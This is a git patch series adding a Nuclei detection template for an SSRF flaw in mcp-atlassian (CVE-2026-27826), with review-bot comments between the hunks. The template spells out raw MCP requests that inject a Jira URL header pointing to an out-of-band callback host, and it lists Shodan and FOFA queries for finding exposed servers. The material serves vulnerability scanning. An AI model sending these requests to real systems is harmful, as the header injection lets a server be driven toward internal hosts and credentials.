From b249bec73eb297edff9b44e297efa3be53ff0b6c Mon Sep 17 00:00:00 2001
From: eyangfeng88-arch
Date: Thu, 16 Apr 2026 23:14:26 +0800
Subject: [PATCH 1/3] feat: add CVE-2026-27826 mcp-atlassian SSRF template
---
 http/cves/2026/CVE-2026-27826.yaml | 79 ++++++++++++++++++++++++++++++
 1 file changed, 79 insertions(+)
 create mode 100644 http/cves/2026/CVE-2026-27826.yaml
diff --git a/http/cves/2026/CVE-2026-27826.yaml b/http/cves/2026/CVE-2026-27826.yaml
new file mode 100644
index 000000000000..6948203fd04e
--- /dev/null
+++ b/http/cves/2026/CVE-2026-27826.yaml
@@ -0,0 +1,79 @@
+id: CVE-2026-27826
+
+info:
+ name: mcp-atlassian < 0.17.0 - SSRF
+ author: eyangfeng88-arch
+ severity: high
+ description: |
+ MCP Atlassian < 0.17.0 contains a server-side request forgery caused by improper validation of custom HTTP headers in the HTTP middleware, letting unauthenticated attackers force outbound requests to arbitrary URLs, exploit requires access to the mcp-atlassian HTTP endpoint.
+ impact: |
+ Unauthenticated attackers can make the server send requests to arbitrary URLs, enabling internal network reconnaissance and potential credential theft.
+ remediation: |
+ Upgrade to version 0.17.0 or later.
+ reference:
+ - https://pluto.security/blog/mcpwnfluence-cve-2026-27825-critical/
+ - https://github.com/sooperset/mcp-atlassian/security/advisories/GHSA-7r34-79r5-rcc9
+ - https://github.com/sooperset/mcp-atlassian/pull/986
+ - https://nvd.nist.gov/vuln/detail/CVE-2026-27826
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 8.2
+ cve-id: CVE-2026-27826
+ cwe-id: CWE-918
+ metadata:
+ verified: true
+ max-request: 2
+ vendor: sooperset
+ product: mcp-atlassian
+ shodan-query: http.html:"Atlassian MCP"
+ fofa-query: body="Atlassian MCP" || header="mcp-session-id"
+ tags: cve,cve2026,mcp,atlassian,ssrf,oast
+
+flow: http(1) && http(2)
+
+http:
+ - raw:
+ - |
+ POST /mcp HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/json
+ Accept: application/json, text/event-stream
+
+ {"jsonrpc":"2.0","id":1,"method":"initialize","params":{"protocolVersion":"2024-11-05","capabilities":{},"clientInfo":{"name":"nuclei","version":"1.0"}}}
+
+ extractors:
+ - type: regex
+ name: session_id
+ part: header
+ internal: true
+ group: 1
+ regex:
+ - '(?i)Mcp-Session-Id:\s*([a-f0-9]+)'
+
+ matchers:
+ - type: dsl
+ dsl:
+ - 'status_code == 200'
+ - 'contains(body, "Atlassian MCP")'
+ - 'len(session_id) > 0'
+ condition: and
+ internal: true
+
+ - raw:
+ - |
+ POST /mcp HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/json
+ Accept: application/json, text/event-stream
+ Mcp-Session-Id: {{session_id}}
+ X-Atlassian-Confluence-Url: http://{{interactsh-url}}
+ X-Atlassian-Confluence-Personal-Token: nuclei-ssrf-test
+
+ {"jsonrpc":"2.0","id":2,"method":"tools/call","params":{"name":"confluence_search","arguments":{"query":"test"}}}
+
+ matchers:
+ - type: dsl
+ dsl:
+ - 'contains(interactsh_protocol, "dns") || contains(interactsh_protocol, "http")'
+ - 'contains(body, "jsonrpc")'
+ condition: and
From 9c8a00971e48802419b392293baca6e406d40c41 Mon Sep 17 00:00:00 2001
From: eyangfeng88-arch
Date: Sat, 18 Apr 2026 03:05:05 +0800
Subject: [PATCH 2/3] fix: correct CVSS vector and use Jira endpoint per GHSA PoC
---
 http/cves/2026/CVE-2026-27826.yaml | 10 ++++------
 1 file changed, 4 insertions(+), 6 deletions(-)
diff --git a/http/cves/2026/CVE-2026-27826.yaml b/http/cves/2026/CVE-2026-27826.yaml
index 6948203fd04e..4a4f49577e18 100644
--- a/http/cves/2026/CVE-2026-27826.yaml
+++ b/http/cves/2026/CVE-2026-27826.yaml
@@ -16,7 +16,7 @@ info:
 - https://github.com/sooperset/mcp-atlassian/pull/986
 - https://nvd.nist.gov/vuln/detail/CVE-2026-27826
 classification:
- cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-metrics: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N
 cvss-score: 8.2
 cve-id: CVE-2026-27826
 cwe-id: CWE-918
@@ -54,7 +54,6 @@ http:
 - type: dsl
 dsl:
 - 'status_code == 200'
- - 'contains(body, "Atlassian MCP")'
 - 'len(session_id) > 0'
 condition: and
 internal: true
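Review bot: The `session_id` extractor in the new template (PATCH 1/3) captures only `[a-f0-9]+`, so a server that issues a session id containing any other character, a hyphenated UUID for instance, yields a truncated value and request 2 goes out with an invalid session; on a vulnerable host that becomes a silent false negative. The MCP transport specification, as far as I know, permits any visible ASCII in that header, so a capture such as `'(?i)Mcp-Session-Id:\s*([!-~]+)'` would be more robust. Separately, the `description` joins two sentences at "arbitrary URLs, exploit requires access"; splitting it there into "… arbitrary URLs. Exploitation requires access to the mcp-atlassian HTTP endpoint." would read better.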
@@ -66,14 +65,13 @@ http:
 Content-Type: application/json
 Accept: application/json, text/event-stream
 Mcp-Session-Id: {{session_id}}
- X-Atlassian-Confluence-Url: http://{{interactsh-url}}
- X-Atlassian-Confluence-Personal-Token: nuclei-ssrf-test
+ X-Atlassian-Jira-Url: http://{{interactsh-url}}
+ X-Atlassian-Jira-Personal-Token: nuclei-ssrf-test
- {"jsonrpc":"2.0","id":2,"method":"tools/call","params":{"name":"confluence_search","arguments":{"query":"test"}}}
+ {"jsonrpc":"2.0","id":2,"method":"tools/call","params":{"name":"jira_get_issue","arguments":{"issue_key":"TEST-1"}}}
 matchers:
 - type: dsl
 dsl:
 - 'contains(interactsh_protocol, "dns") || contains(interactsh_protocol, "http")'
- - 'contains(body, "jsonrpc")'
 condition: and
From cfa3b7a8668c9364f3b8f4cfa60b7622e501be95 Mon Sep 17 00:00:00 2001
From: eyangfeng88-arch
Date: Sat, 18 Apr 2026 03:13:31 +0800
Subject: [PATCH 3/3] fix: correct CVSS vector and use Jira endpoint per GHSA PoC
---
 http/cves/2026/CVE-2026-27826.yaml | 154 ++++++++++++++---------------
 1 file changed, 77 insertions(+), 77 deletions(-)
diff --git a/http/cves/2026/CVE-2026-27826.yaml b/http/cves/2026/CVE-2026-27826.yaml
index 4a4f49577e18..688b668f2022 100644
--- a/http/cves/2026/CVE-2026-27826.yaml
+++ b/http/cves/2026/CVE-2026-27826.yaml
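Review bot: Once this hunk drops `contains(body, "jsonrpc")` (and the `@@ -54,7 +54,6 @@` hunk drops the `"Atlassian MCP"` body check from request 1), the only evidence left for a finding is an interactsh callback of either protocol. A DNS-only callback may come from a proxy, WAF or log pipeline that resolves hostnames it sees in request headers rather than from mcp-atlassian itself, so the template can report hosts that never made the outbound request. Requiring the HTTP callback, `- 'contains(interactsh_protocol, "http")'`, would tie the result to an actual server-side fetch; with a single expression left, `condition: and` is also redundant. Neither matcher removal is mentioned in the commit subject, so a sentence in the description saying why the body checks were dropped would help the next reviewer.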
@@ -1,77 +1,77 @@
-id: CVE-2026-27826
-
-info:
- name: mcp-atlassian < 0.17.0 - SSRF
- author: eyangfeng88-arch
- severity: high
- description: |
- MCP Atlassian < 0.17.0 contains a server-side request forgery caused by improper validation of custom HTTP headers in the HTTP middleware, letting unauthenticated attackers force outbound requests to arbitrary URLs, exploit requires access to the mcp-atlassian HTTP endpoint.
- impact: |
- Unauthenticated attackers can make the server send requests to arbitrary URLs, enabling internal network reconnaissance and potential credential theft.
- remediation: |
- Upgrade to version 0.17.0 or later.
- reference:
- - https://pluto.security/blog/mcpwnfluence-cve-2026-27825-critical/
- - https://github.com/sooperset/mcp-atlassian/security/advisories/GHSA-7r34-79r5-rcc9
- - https://github.com/sooperset/mcp-atlassian/pull/986
- - https://nvd.nist.gov/vuln/detail/CVE-2026-27826
- classification:
- cvss-metrics: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N
- cvss-score: 8.2
- cve-id: CVE-2026-27826
- cwe-id: CWE-918
- metadata:
- verified: true
- max-request: 2
- vendor: sooperset
- product: mcp-atlassian
- shodan-query: http.html:"Atlassian MCP"
- fofa-query: body="Atlassian MCP" || header="mcp-session-id"
- tags: cve,cve2026,mcp,atlassian,ssrf,oast
-
-flow: http(1) && http(2)
-
-http:
- - raw:
- - |
- POST /mcp HTTP/1.1
- Host: {{Hostname}}
- Content-Type: application/json
- Accept: application/json, text/event-stream
-
- {"jsonrpc":"2.0","id":1,"method":"initialize","params":{"protocolVersion":"2024-11-05","capabilities":{},"clientInfo":{"name":"nuclei","version":"1.0"}}}
-
- extractors:
- - type: regex
- name: session_id
- part: header
- internal: true
- group: 1
- regex:
- - '(?i)Mcp-Session-Id:\s*([a-f0-9]+)'
-
- matchers:
- - type: dsl
- dsl:
- - 'status_code == 200'
- - 'len(session_id) > 0'
- condition: and
- internal: true
-
- - raw:
- - |
- POST /mcp HTTP/1.1
- Host: {{Hostname}}
- Content-Type: application/json
- Accept: application/json, text/event-stream
- Mcp-Session-Id: {{session_id}}
- X-Atlassian-Jira-Url: http://{{interactsh-url}}
- X-Atlassian-Jira-Personal-Token: nuclei-ssrf-test
-
- {"jsonrpc":"2.0","id":2,"method":"tools/call","params":{"name":"jira_get_issue","arguments":{"issue_key":"TEST-1"}}}
-
- matchers:
- - type: dsl
- dsl:
- - 'contains(interactsh_protocol, "dns") || contains(interactsh_protocol, "http")'
- condition: and
+id: CVE-2026-27826
+
+info:
+ name: mcp-atlassian < 0.17.0 - SSRF
+ author: eyangfeng88-arch
+ severity: high
+ description: |
+ MCP Atlassian < 0.17.0 contains a server-side request forgery caused by improper validation of custom HTTP headers in the HTTP middleware, letting unauthenticated attackers force outbound requests to arbitrary URLs, exploit requires access to the mcp-atlassian HTTP endpoint.
+ impact: |
+ Unauthenticated attackers can make the server send requests to arbitrary URLs, enabling internal network reconnaissance and potential credential theft.
+ remediation: |
+ Upgrade to version 0.17.0 or later.
+ reference:
+ - https://pluto.security/blog/mcpwnfluence-cve-2026-27825-critical/
+ - https://github.com/sooperset/mcp-atlassian/security/advisories/GHSA-7r34-79r5-rcc9
+ - https://github.com/sooperset/mcp-atlassian/pull/986
+ - https://nvd.nist.gov/vuln/detail/CVE-2026-27826
+ classification:
+ cvss-metrics: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N
+ cvss-score: 8.2
+ cve-id: CVE-2026-27826
+ cwe-id: CWE-918
+ metadata:
+ verified: true
+ max-request: 2
+ vendor: sooperset
+ product: mcp-atlassian
+ shodan-query: http.html:"Atlassian MCP"
+ fofa-query: body="Atlassian MCP" || header="mcp-session-id"
+ tags: cve,cve2026,mcp,atlassian,ssrf,oast
+
+flow: http(1) && http(2)
+
+http:
+ - raw:
+ - |
+ POST /mcp HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/json
+ Accept: application/json, text/event-stream
+
+ {"jsonrpc":"2.0","id":1,"method":"initialize","params":{"protocolVersion":"2024-11-05","capabilities":{},"clientInfo":{"name":"nuclei","version":"1.0"}}}
+
+ extractors:
+ - type: regex
+ name: session_id
+ part: header
+ internal: true
+ group: 1
+ regex:
+ - '(?i)Mcp-Session-Id:\s*([a-f0-9]+)'
+
+ matchers:
+ - type: dsl
+ dsl:
+ - 'status_code == 200'
+ - 'len(session_id) > 0'
+ condition: and
+ internal: true
+
+ - raw:
+ - |
+ POST /mcp HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/json
+ Accept: application/json, text/event-stream
+ Mcp-Session-Id: {{session_id}}
+ X-Atlassian-Jira-Url: http://{{interactsh-url}}
+ X-Atlassian-Jira-Personal-Token: nuclei-ssrf-test
+
+ {"jsonrpc":"2.0","id":2,"method":"tools/call","params":{"name":"jira_get_issue","arguments":{"issue_key":"TEST-1"}}}
+
+ matchers:
+ - type: dsl
+ dsl:
+ - 'contains(interactsh_protocol, "dns") || contains(interactsh_protocol, "http")'
+ condition: and